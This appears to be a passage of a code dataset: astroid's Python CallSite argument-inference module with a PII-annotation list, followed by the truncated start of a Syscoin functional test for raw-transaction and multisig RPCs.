75,"# Copyright (c) 2015-2016, 2018-2020 Claudiu Popa dummy@email.com
# Copyright (c) 2015-2016 Ceridwen dummy@email.com
# Copyright (c) 2018 Bryce Guinta dummy@email.com
# Copyright (c) 2018 Nick Drozd dummy@email.com
# Copyright (c) 2018 Anthony Sottile dummy@email.com
# Copyright (c) 2020 hippo91 dummy@email.com
# Copyright (c) 2021 Pierre Sassoulas dummy@email.com
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/LICENSE
from astroid import bases
from astroid import context as contextmod
from astroid import exceptions, nodes, util
class CallSite:
""""""Class for understanding arguments passed into a call site
It needs a call context, which contains the arguments and the
keyword arguments that were passed into a given call site.
In order to infer what an argument represents, call :meth:`infer_argument`
with the corresponding function node and the argument name.
:param callcontext:
An instance of :class:`astroid.context.CallContext`, that holds
the arguments for the call site.
:param argument_context_map:
Additional contexts per node, passed in from :attr:`astroid.context.Context.extra_context`
:param context:
An instance of :class:`astroid.context.Context`.
""""""
def __init__(self, callcontext, argument_context_map=None, context=None):
if argument_context_map is None:
argument_context_map = {}
self.argument_context_map = argument_context_map
args = callcontext.args
keywords = callcontext.keywords
self.duplicated_keywords = set()
self._unpacked_args = self._unpack_args(args, context=context)
self._unpacked_kwargs = self._unpack_keywords(keywords, context=context)
self.positional_arguments = [
arg for arg in self._unpacked_args if arg is not util.Uninferable
]
self.keyword_arguments = {
key: value
for key, value in self._unpacked_kwargs.items()
if value is not util.Uninferable
}
@classmethod
def from_call(cls, call_node, context=None):
""""""Get a CallSite object from the given Call node.
:param context:
An instance of :class:`astroid.context.Context` that will be used
to force a single inference path.
""""""
# Determine the callcontext from the given `context` object if any.
context = context or contextmod.InferenceContext()
callcontext = contextmod.CallContext(call_node.args, call_node.keywords)
return cls(callcontext, context=context)
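# Usage sketch for from_call (astroid's public extract_node helper marks the
# node of interest with #@):
#
#     import astroid
#     call = astroid.extract_node('f(1, *unknown, x=2)  #@')
#     site = CallSite.from_call(call)
#     site.positional_arguments   # inferable positionals only
#     site.keyword_arguments      # inferable keywords only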
def has_invalid_arguments(self):
""""""Check if in the current CallSite were passed *invalid* arguments
This can mean multiple things. For instance, if an unpacking
of an invalid object was passed, then this method will return True.
Other cases can be when the arguments can't be inferred by astroid,
for example, by passing objects which aren't known statically.
""""""
return len(self.positional_arguments) != len(self._unpacked_args)
def has_invalid_keywords(self):
""""""Check if in the current CallSite were passed *invalid* keyword arguments
For instance, unpacking a dictionary with integer keys is invalid
(**{1:2}), because the keys must be strings, which will make this
method to return True. Other cases where this might return True if
objects which can't be inferred were passed.
""""""
return len(self.keyword_arguments) != len(self._unpacked_kwargs)
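# For example, for a call like f(**{1: 2}) the unpacked key is a non-string
# Const, so _unpack_keywords (below) records util.Uninferable for it and
# has_invalid_keywords() returns True.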
def _unpack_keywords(self, keywords, context=None):
values = {}
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for name, value in keywords:
if name is None:
# Then it's an unpacking operation (**)
try:
inferred = next(value.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(inferred, nodes.Dict):
# Not something we can work with.
values[name] = util.Uninferable
continue
for dict_key, dict_value in inferred.items:
try:
dict_key = next(dict_key.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(dict_key, nodes.Const):
values[name] = util.Uninferable
continue
if not isinstance(dict_key.value, str):
values[name] = util.Uninferable
continue
if dict_key.value in values:
# The name is already in the dictionary
values[dict_key.value] = util.Uninferable
self.duplicated_keywords.add(dict_key.value)
continue
values[dict_key.value] = dict_value
else:
values[name] = value
return values
def _unpack_args(self, args, context=None):
values = []
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for arg in args:
if isinstance(arg, nodes.Starred):
try:
inferred = next(arg.value.infer(context=context))
except exceptions.InferenceError:
values.append(util.Uninferable)
continue
if inferred is util.Uninferable:
values.append(util.Uninferable)
continue
if not hasattr(inferred, ""elts""):
values.append(util.Uninferable)
continue
values.extend(inferred.elts)
else:
values.append(arg)
return values
def infer_argument(self, funcnode, name, context):
""""""infer a function argument value according to the call context
Arguments:
funcnode: The function being called.
name: The name of the argument whose value is being inferred.
context: Inference context object
""""""
if name in self.duplicated_keywords:
raise exceptions.InferenceError(
""The arguments passed to {func!r} "" "" have duplicate keywords."",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
# Look into the keywords first, maybe it's already there.
try:
return self.keyword_arguments[name].infer(context)
except KeyError:
pass
# Too many arguments given and no variable arguments.
if len(self.positional_arguments) > len(funcnode.args.args):
if not funcnode.args.vararg and not funcnode.args.posonlyargs:
raise exceptions.InferenceError(
""Too many positional arguments ""
""passed to {func!r} that does ""
""not have *args."",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
positional = self.positional_arguments[: len(funcnode.args.args)]
vararg = self.positional_arguments[len(funcnode.args.args) :]
argindex = funcnode.args.find_argname(name)[0]
kwonlyargs = {arg.name for arg in funcnode.args.kwonlyargs}
kwargs = {
key: value
for key, value in self.keyword_arguments.items()
if key not in kwonlyargs
}
# If there are too few positionals compared to
# what the function expects to receive, check to see
# if the missing positional arguments were passed
# as keyword arguments and if so, place them into the
# positional args list.
if len(positional) < len(funcnode.args.args):
for func_arg in funcnode.args.args:
if func_arg.name in kwargs:
arg = kwargs.pop(func_arg.name)
positional.append(arg)
if argindex is not None:
# 1. first argument of instance/class method
if argindex == 0 and funcnode.type in (""method"", ""classmethod""):
if context.boundnode is not None:
boundnode = context.boundnode
else:
# XXX can do better ?
boundnode = funcnode.parent.frame()
if isinstance(boundnode, nodes.ClassDef):
# Verify that we're accessing a method
# of the metaclass through a class, as in
# `cls.metaclass_method`. In this case, the
# first argument is always the class.
method_scope = funcnode.parent.scope()
if method_scope is boundnode.metaclass():
return iter((boundnode,))
if funcnode.type == ""method"":
if not isinstance(boundnode, bases.Instance):
boundnode = boundnode.instantiate_class()
return iter((boundnode,))
if funcnode.type == ""classmethod"":
return iter((boundnode,))
# if we have a method, extract one position
# from the index, so we'll take into account
# the extra parameter represented by `self` or `cls`
if funcnode.type in (""method"", ""classmethod""):
argindex -= 1
# 2. search arg index
try:
return self.positional_arguments[argindex].infer(context)
except IndexError:
pass
if funcnode.args.kwarg == name:
# It wants all the keywords that were passed into
# the call site.
if self.has_invalid_keywords():
raise exceptions.InferenceError(
""Inference failed to find values for all keyword arguments ""
""to {func!r}: {unpacked_kwargs!r} doesn't correspond to ""
""{keyword_arguments!r}."",
keyword_arguments=self.keyword_arguments,
unpacked_kwargs=self._unpacked_kwargs,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
kwarg = nodes.Dict(
lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
kwarg.postinit(
[(nodes.const_factory(key), value) for key, value in kwargs.items()]
)
return iter((kwarg,))
if funcnode.args.vararg == name:
# It wants all the args that were passed into
# the call site.
if self.has_invalid_arguments():
raise exceptions.InferenceError(
""Inference failed to find values for all positional ""
""arguments to {func!r}: {unpacked_args!r} doesn't ""
""correspond to {positional_arguments!r}."",
positional_arguments=self.positional_arguments,
unpacked_args=self._unpacked_args,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
args = nodes.Tuple(
lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
args.postinit(vararg)
return iter((args,))
# Check if it's a default parameter.
try:
return funcnode.args.default_value(name).infer(context)
except exceptions.NoDefault:
pass
raise exceptions.InferenceError(
""No value found for argument {arg} to {func!r}"",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
",12599,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-2016'], ['DATE_TIME', '2018-2020'], ['PERSON', 'Claudiu Popa'], ['DATE_TIME', '2015-2016'], ['PERSON', 'Ceridwen'], ['PERSON', 'Nick Drozd'], ['PERSON', 'Anthony Sottile'], ['DATE_TIME', '2020'], ['PERSON', 'hippo91'], ['DATE_TIME', '2021'], ['PERSON', 'Pierre Sassoulas'], ['PERSON', 'callcontext = contextmod'], ['PERSON', 'kwonlyargs'], ['PERSON', 'boundnode'], ['PERSON', 'boundnode'], ['PERSON', 'lineno=funcnode.args.lineno'], ['PERSON', 'lineno=funcnode.args.lineno'], ['URL', 'https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html'], ['URL', 'https://github.com/PyCQA/astroid/blob/master/LICENSE'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'astroid.context.Ca'], ['URL', 'astroid.context.Co'], ['URL', 'astroid.context.Co'], ['URL', 'self.ar'], ['URL', 'callcontext.ar'], ['URL', 'callcontext.ke'], ['URL', 'self.ke'], ['URL', 'kwargs.it'], ['URL', 'astroid.context.Co'], ['URL', 'contextmod.In'], ['URL', 'contextmod.Ca'], ['URL', 'node.ar'], ['URL', 'node.ke'], ['URL', 'self.ke'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'value.in'], ['URL', 'exceptions.In'], ['URL', 'inferred.it'], ['URL', 'key.in'], ['URL', 'exceptions.In'], ['URL', 'nodes.Co'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'keywords.ad'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'nodes.St'], ['URL', 'arg.value.in'], ['URL', 'exceptions.In'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.va'], ['URL', 'funcnode.ar'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.fi'], ['URL', 'arg.na'], ['URL', 'funcnode.args.kw'], ['URL', 'self.ke'], ['URL', 'arguments.it'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'arg.na'], ['URL', 'arg.na'], ['URL', 'context.bo'], ['URL', 'context.bo'], ['URL', 'funcnode.parent.fr'], ['URL', 'nodes.Cl'], ['URL', 'cls.me'], ['URL', 'funcnode.parent.sc'], ['URL', 'boundnode.me'], ['URL', 'bases.In'], ['URL', 'boundnode.in'], ['URL', 'funcnode.args.kw'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'nodes.co'], ['URL', 'kwargs.it'], ['URL', 'funcnode.args.va'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'funcnode.args.de'], ['URL', 'exceptions.No'], ['URL', 'exceptions.In']]"
76,"#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
""""""Test the rawtransaction RPCs.
Test the following RPCs:
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
- getrawtransaction
""""""
from collections import OrderedDict
from decimal import Decimal
from io import BytesIO
from test_framework.messages import CTransaction, ToHex
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
find_vout_for_address,
hex_str_to_bytes,
)
class multidict(dict):
""""""Dictionary that allows duplicate keys.
Constructed with a list of (key, value) tuples. When dumped by the json module,
will output invalid json with repeated keys, e.g.:
>>> json.dumps(multidict([(1,2),(1,2)]))
'{""1"": 2, ""1"": 2}'
Used to test calls to rpc methods with repeated keys in the json object.""""""
def __init__(self, x):
dict.__init__(self, x)
self.x = x
def items(self):
return self.x
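# Quick demonstration of the duplicate-key behaviour (json.dumps fetches the
# mapping's items(), so the repeated tuples survive into the output):
#
#     >>> import json
#     >>> json.dumps(multidict([('txid', 'aa'), ('txid', 'aa')]))
#     '{""txid"": ""aa"", ""txid"": ""aa""}'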
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [
[""-txindex""],
[""-txindex""],
[""-txindex""],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
super().setup_network()
self.connect_nodes(0, 2)
def run_test(self):
self.log.info('prepare some coins for multiple *rawtransaction commands')
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(101)
self.sync_all()
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0)
self.sync_all()
self.nodes[0].generate(5)
self.sync_all()
self.log.info('Test getrawtransaction on genesis block coinbase returns an error')
block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
assert_raises_rpc_error(-5, ""The genesis block coinbase is not considered an ordinary transaction"", self.nodes[0].getrawtransaction, block['merkleroot'])
self.log.info('Check parameter types and required parameters of createrawtransaction')
# Test `createrawtransaction` required parameters
assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction)
assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, [])
# Test `createrawtransaction` invalid extra parameters
assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
# Test `createrawtransaction` invalid `inputs`
txid = 'PI:KEY'
assert_raises_rpc_error(-3, ""Expected type array"", self.nodes[0].createrawtransaction, 'foo', {})
assert_raises_rpc_error(-1, ""JSON value is not an object as expected"", self.nodes[0].createrawtransaction, ['foo'], {})
assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].createrawtransaction, [{}], {})
assert_raises_rpc_error(-8, ""txid must be of length 64 (not 3, for 'foo')"", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
assert_raises_rpc_error(-8, ""txid must be hexadecimal string (not 'PI:KEY')"", self.nodes[0].createrawtransaction, [{'txid': 'PI:KEY'}], {})
assert_raises_rpc_error(-8, ""Invalid parameter, missing vout key"", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
assert_raises_rpc_error(-8, ""Invalid parameter, missing vout key"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 'foo'}], {})
assert_raises_rpc_error(-8, ""Invalid parameter, vout cannot be negative"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': -1}], {})
assert_raises_rpc_error(-8, ""Invalid parameter, sequence number is out of range"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 0, 'sequence': -1}], {})
# Test `createrawtransaction` invalid `outputs`
address = self.nodes[0].getnewaddress()
address2 = self.nodes[0].getnewaddress()
assert_raises_rpc_error(-1, ""JSON value is not an array as expected"", self.nodes[0].createrawtransaction, [], 'foo')
self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility
self.nodes[0].createrawtransaction(inputs=[], outputs=[])
assert_raises_rpc_error(-8, ""Data must be hexadecimal string"", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
assert_raises_rpc_error(-5, ""Invalid Syscoin address"", self.nodes[0].createrawtransaction, [], {'foo': 0})
assert_raises_rpc_error(-3, ""Invalid amount"", self.nodes[0].createrawtransaction, [], {address: 'foo'})
assert_raises_rpc_error(-3, ""Amount out of range"", self.nodes[0].createrawtransaction, [], {address: -1})
assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])
assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], [{""data"": 'aa'}, {""data"": ""bb""}])
assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], multidict([(""data"", 'aa'), (""data"", ""bb"")]))
assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair must contain exactly one key"", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}])
assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair not an object as expected"", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']])
# Test `createrawtransaction` invalid `locktime`
assert_raises_rpc_error(-3, ""Expected type number"", self.nodes[0].createrawtransaction, [], {}, 'foo')
assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, -1)
assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, 4294967296)
# Test `createrawtransaction` invalid `replaceable`
assert_raises_rpc_error(-3, ""Expected type bool"", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
self.log.info('Check that createrawtransaction accepts an array and object as outputs')
tx = CTransaction()
# One output
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs={address: 99}))))
assert_equal(len(tx.vout), 1)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}]),
)
# Two outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))))
assert_equal(len(tx.vout), 2)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]),
)
# Multiple mixed outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')])))))
assert_equal(len(tx.vout), 3)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]),
)
for type in [""bech32"", ""p2sh-segwit"", ""legacy""]:
addr = self.nodes[0].getnewaddress("""", type)
addrinfo = self.nodes[0].getaddressinfo(addr)
pubkey = addrinfo[""scriptPubKey""]
self.log.info('sendrawtransaction with missing prevtx info (%s)' %(type))
# Test `signrawtransactionwithwallet` invalid `prevtxs`
inputs = [ {'txid' : txid, 'vout' : 3, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
prevtx = dict(txid=txid, scriptPubKey=pubkey, vout=3, amount=1)
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ[""complete""]
if type == ""legacy"":
del prevtx[""amount""]
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ[""complete""]
if type != ""legacy"":
assert_raises_rpc_error(-3, ""Missing amount"", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
""txid"": txid,
""scriptPubKey"": pubkey,
""vout"": 3,
}
])
assert_raises_rpc_error(-3, ""Missing vout"", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
""txid"": txid,
""scriptPubKey"": pubkey,
""amount"": 1,
}
])
assert_raises_rpc_error(-3, ""Missing txid"", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
""scriptPubKey"": pubkey,
""vout"": 3,
""amount"": 1,
}
])
assert_raises_rpc_error(-3, ""Missing scriptPubKey"", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
""txid"": txid,
""vout"": 3,
""amount"": 1
}
])
#########################################
# sendrawtransaction with missing input #
#########################################
self.log.info('sendrawtransaction with missing input')
inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1}] #won't exists
outputs = { self.nodes[0].getnewaddress() : 4.998 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)
# This will raise an exception since there are missing inputs
assert_raises_rpc_error(-25, ""bad-txns-inputs-missingorspent"", self.nodes[2].sendrawtransaction, rawtx['hex'])
#####################################
# getrawtransaction with block hash #
#####################################
# make a tx by sending then generate 2 blocks; block1 has the tx in it
tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
block1, block2 = self.nodes[2].generate(2)
self.sync_all()
# We should be able to get the raw transaction by providing the correct block
gottx = self.nodes[0].getrawtransaction(tx, True, block1)
assert_equal(gottx['txid'], tx)
assert_equal(gottx['in_active_chain'], True)
# We should have the 'in_active_chain' flag when we don't provide a block due to blockindexdb
gottx = self.nodes[0].getrawtransaction(tx, True)
assert_equal(gottx['txid'], tx)
# SYSCOIN
assert 'in_active_chain' in gottx
# We should not get the tx if we provide an unrelated block
assert_raises_rpc_error(-5, ""No such transaction found"", self.nodes[0].getrawtransaction, tx, True, block2)
# An invalid block hash should raise the correct errors
assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].getrawtransaction, tx, True, True)
assert_raises_rpc_error(-8, ""parameter 3 must be of length 64 (not 6, for 'foobar')"", self.nodes[0].getrawtransaction, tx, True, ""foobar"")
assert_raises_rpc_error(-8, ""parameter 3 must be of length 64 (not 8, for 'abcd1234')"", self.nodes[0].getrawtransaction, tx, True, ""abcd1234"")
assert_raises_rpc_error(-8, ""parameter 3 must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')"", self.nodes[0].getrawtransaction, tx, True, ""ZZZ0000000000000000000000000000000000000000000000000000000000000"")
assert_raises_rpc_error(-5, ""Block hash not found"", self.nodes[0].getrawtransaction, tx, True, ""0000000000000000000000000000000000000000000000000000000000000000"")
# Undo the blocks and check in_active_chain
self.nodes[0].invalidateblock(block1)
gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['in_active_chain'], False)
self.nodes[0].reconsiderblock(block1)
assert_equal(self.nodes[0].getbestblockhash(), block2)
if not self.options.descriptors:
# The traditional multisig workflow does not work with descriptor wallets so these are legacy only.
# The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.
#########################
# RAW TX MULTISIG TESTS #
#########################
# 2of2 test
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
# Tests for createmultisig and addmultisigaddress
assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 1, [""01020304""])
self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # createmultisig can only take public keys
assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here.
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
#use balance deltas instead of absolute values
bal = self.nodes[2].getbalance()
# send 1.2 SYS to msig adr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal+Decimal('1.20000000')) # node2 has both keys of the 2of2 multisig addr., tx should affect the balance
# 2of3 test from different nodes
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr3 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
addr3Obj = self.nodes[2].getaddressinfo(addr3)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#THIS IS AN INCOMPLETE FEATURE
#NODE2 HAS TWO OF THREE KEY AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION
assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ ""txid"" : txId, ""vout"" : vout['n'], ""scriptPubKey"" : vout['scriptPubKey']['hex'], ""amount"" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxPartialSigned['complete'], False) # node1 only has one key, can't completely sign the tx
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxSigned['complete'], True) # node2 can sign the tx completely, owning two of three keys
self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# 2of2 test for combining transactions
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ ""txid"" : txId, ""vout"" : vout['n'], ""scriptPubKey"" : vout['scriptPubKey']['hex'], ""redeemScript"" : mSigObjValid['hex'], ""amount"" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned1)
assert_equal(rawTxPartialSigned1['complete'], False) # node1 only has one key, can't completely sign the tx
rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned2)
assert_equal(rawTxPartialSigned2['complete'], False) # node2 only has one key, can't completely sign the tx
rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
self.log.debug(rawTxComb)
self.nodes[2].sendrawtransaction(rawTxComb)
rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# decoderawtransaction tests
# witness transaction
encrawtx = ""PI:KEY""
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction
# non-witness transaction
encrawtx = ""PI:KEY""
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
# known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)
encrawtx = ""PI:KEY""
decrawtx = self.nodes[0].decoderawtransaction(encrawtx)
decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction
assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen
assert_equal(decrawtx['vin'][0]['coinbase'], ""PI:KEY"")
# Basic signrawtransaction test
addr = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr, 10)
self.nodes[0].generate(1)
self.sync_all()
vout = find_vout_for_address(self.nodes[1], txid, addr)
rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999})
rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)
txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex'])
self.nodes[0].generate(1)
